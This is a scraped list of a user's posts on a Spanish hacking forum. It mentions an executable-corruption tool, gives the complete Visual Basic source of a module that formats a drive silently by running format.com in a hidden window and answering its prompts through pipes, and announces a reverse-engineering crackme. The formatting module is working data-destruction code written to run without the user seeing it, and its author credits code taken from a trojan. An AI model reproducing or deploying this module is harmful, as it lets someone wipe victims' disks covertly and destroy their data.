- Se reemplaza el primer BYTE por un RET (C3h)
Aqui teneis el codigo en VB: http://foro.elhacker.net/programacion_vb/sourceret_exe_corruption_corrompe_cualquier_ejecutable-t251138.0.html;msg1211626#msg1211626 Saludos
|
|
|
89
|
Programación / Programación Visual Basic / [SRC]mFormat - Formatea Unidades desde VB {De forma oculta}
|
en: 13 Febrero 2009, 17:05 pm
|
Bueno, hasta las narices de este post: http://foro.elhacker.net/programacion_vb/formatear_sin_usar_shformatdrive-t244230.0.html Por eso he hecho este modulo usando PIPES (Gracias Cobein) Aqui viene: '--------------------------------------------------------------------------------------- ' Modulo : mFormat ' Autor : Karcrack ' Fecha-Hora: 13/02/2009 16:25 ' Finalidad : Formatear una Unidad de Forma oculta, usando PIPES ' Referencia: Clase StdIO de COBEIN, de su 'troyano' ' Agradec. : A COBEIN :D Por su code ;) '--------------------------------------------------------------------------------------- Option Explicit Private Const PROCESS_QUERY_INFORMATION As Long = &H400 Private Const PROCESS_TERMINATE As Long = (&H1) Private Const PROCESS_VM_READ As Long = &H10 Private Const NORMAL_PRIORITY_CLASS As Long = &H20& Private Const STARTF_USESTDHANDLES As Long = &H100& Private Const STARTF_USESHOWWINDOW As Long = &H1 Private Const SW_HIDE As Long = 0 Private Const PIPE_WAIT As Long = &H0 Private Const PIPE_NOWAIT As Long = &H1 Private Const PIPE_READMODE_BYTE As Long = &H0 Private Const PIPE_READMODE_MESSAGE As Long = &H2 Private Const PIPE_TYPE_BYTE As Long = &H0 Private Const PIPE_TYPE_MESSAGE As Long = &H4 Private Type SECURITY_ATTRIBUTES nLength As Long lpSecurityDescriptor As Long bInheritHandle As Long End Type Private Type STARTUPINFO cb As Long lpReserved As Long lpDesktop As Long lpTitle As Long dwX As Long dwY As Long dwXSize As Long dwYSize As Long dwXCountChars As Long dwYCountChars As Long dwFillAttribute As Long dwFlags As Long wShowWindow As Integer cbReserved2 As Integer lpReserved2 As Long hStdInput As Long hStdOutput As Long hStdError As Long End Type Private Type PROCESS_INFORMATION hProcess As Long hThread As Long dwProcessId As Long dwThreadID As Long End Type Private Declare Function CreatePipe Lib "kernel32" (phReadPipe As Long, phWritePipe As Long, lpPipeAttributes As Any, ByVal nSize As Long) As Long Private Declare Function SetNamedPipeHandleState Lib "kernel32" (ByVal hNamedPipe As Long, lpMode As Long, lpMaxCollectionCount As Long, lpCollectDataTimeout As Long) As Long Private Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, ByVal lpBuffer As String, ByVal nNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Any) As Long Private Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Any, ByVal nNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Any) As Long Private Declare Function CreateProcessA Lib "kernel32" (ByVal lpApplicationName As Long, ByVal lpCommandLine As String, lpProcessAttributes As SECURITY_ATTRIBUTES, lpThreadAttributes As SECURITY_ATTRIBUTES, ByVal bInheritHandles As Long, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As Long, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hHandle As Long) As Long Private Declare Function GetExitCodeProcess Lib "kernel32" (ByVal hProcess As Long, lpExitCode As Long) As Long Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As String) As Long Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Long) As Long Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Sub Sleep Lib "kernel32.dll" (ByVal dwMilliseconds As Long) Private c_bPiping As Boolean Private c_bCancel As Boolean Private c_lhReadPipe As Long Private c_lhWritePipe As Long Private c_lhReadPipe2 As Long Private c_lhWritePipe2 As Long Dim tSTARTUPINFO As STARTUPINFO Dim tPROCESS_INFORMATION As PROCESS_INFORMATION Dim tSECURITY_ATTRIBUTES As SECURITY_ATTRIBUTES Dim sBuffer As String * 4096 Public Function AltFormat(ByVal sDrive As String, Optional ByVal Quick As Boolean, Optional ByVal sName As String) As Boolean Dim sCmd As String sCmd = "format.com " & sDrive & " /X" & IIf((Quick = True), " /Q", vbNullString) If Not Left$(sName, 1) = Chr$(13) Then sName = sName & Chr$(13) With tSECURITY_ATTRIBUTES .nLength = LenB(tSECURITY_ATTRIBUTES) .bInheritHandle = True .lpSecurityDescriptor = False End With Call CreatePipe(c_lhReadPipe, c_lhWritePipe, tSECURITY_ATTRIBUTES, 0&) Call CreatePipe(c_lhReadPipe2, c_lhWritePipe2, tSECURITY_ATTRIBUTES, 0&) Call SetNamedPipeHandleState(c_lhReadPipe, PIPE_READMODE_BYTE Or PIPE_NOWAIT, 0&, 0&) With tSTARTUPINFO .cb = LenB(tSTARTUPINFO) .dwFlags = STARTF_USESTDHANDLES Or STARTF_USESHOWWINDOW .wShowWindow = SW_HIDE .hStdOutput = c_lhWritePipe .hStdError = c_lhWritePipe .hStdInput = c_lhReadPipe2 End With Call CreateProcessA(0&, sCmd, tSECURITY_ATTRIBUTES, tSECURITY_ATTRIBUTES, 1&, NORMAL_PRIORITY_CLASS, 0&, 0&, tSTARTUPINFO, tPROCESS_INFORMATION) If InStr(1, WriteToPipe(Chr$(13)), "Escriba una etiqueta de volumen", vbTextCompare) <> 0 Then Do Until InStr(1, WriteToPipe(sName), "a otro disco (S/N)", vbTextCompare) <> 0 Call Sleep(1000) Loop End If Call CloseHandle(tPROCESS_INFORMATION.hProcess) Call CloseHandle(c_lhReadPipe): c_lhReadPipe = 0 Call CloseHandle(c_lhReadPipe2): c_lhReadPipe2 = 0 Call CloseHandle(c_lhWritePipe): c_lhWritePipe = 0 Call CloseHandle(c_lhWritePipe2): c_lhWritePipe2 = 0 AltFormat = ExitProcessPID(tPROCESS_INFORMATION.dwProcessId) End Function Private Function WriteToPipe(ByVal sData As String) As String Dim bvData() As Byte bvData = StrConv(sData & vbCrLf & vbNullChar, vbFromUnicode) Call WriteFile(c_lhWritePipe2, bvData(0), UBound(bvData), 0, 0&) Do DoEvents: Call Sleep(2500) If Not ReadFile(c_lhReadPipe, sBuffer, 4096, 0, 0&) = 0 Then WriteToPipe = Left$(sBuffer, lstrlen(sBuffer)) sBuffer = String$(4096, vbNullChar) DoEvents Else Exit Do End If Loop End Function Private Function ExitProcessPID(ByVal lProcessID As Long) As Boolean Dim lProcess As Long Dim lExitCode As Long lProcess = OpenProcess(PROCESS_TERMINATE Or PROCESS_QUERY_INFORMATION Or _ PROCESS_VM_READ, _ 0, lProcessID) If GetExitCodeProcess(lProcess, lExitCode) Then TerminateProcess lProcess, lExitCode ExitProcessPID = True End If Call CloseHandle(lProcess) End Function
Forma de uso:Call AltFormat("A:", True)
NOTA: Solo funciona con W$ en españolSaludos PD:Odio el nuevo 'xD' ( = )
|
|
|
90
|
Programación / Ingeniería Inversa / #3 CrackMe (Karcrack){Dificultad:¿8/10?}
|
en: 8 Febrero 2009, 13:57 pm
|
Bueno, aqui mi Tercer CrackMe Lenguaje: VB6 Dificultad: Muy Dificil (Esto es un poco subjetivo )Lo que hay que hacer es:0- Conseguir cumplir la condicion oculta 1- Obtener un Usuario y Contraseña valido. Nota:Un mismo usuario puede tener contraseñas infintas 2- Hacer un KeyGen (Opcional y ¿Dificil?) Lo que no hay que hacer es:1- Parchear para que acepta cualquier User y Password Descarga:http://www.box.net/shared/d9zur18gpy Hall Of Fame:Aqui adjunto el KeyGen de PeterPunk : Saludos y Suerte
|
|
|
|
|
|
|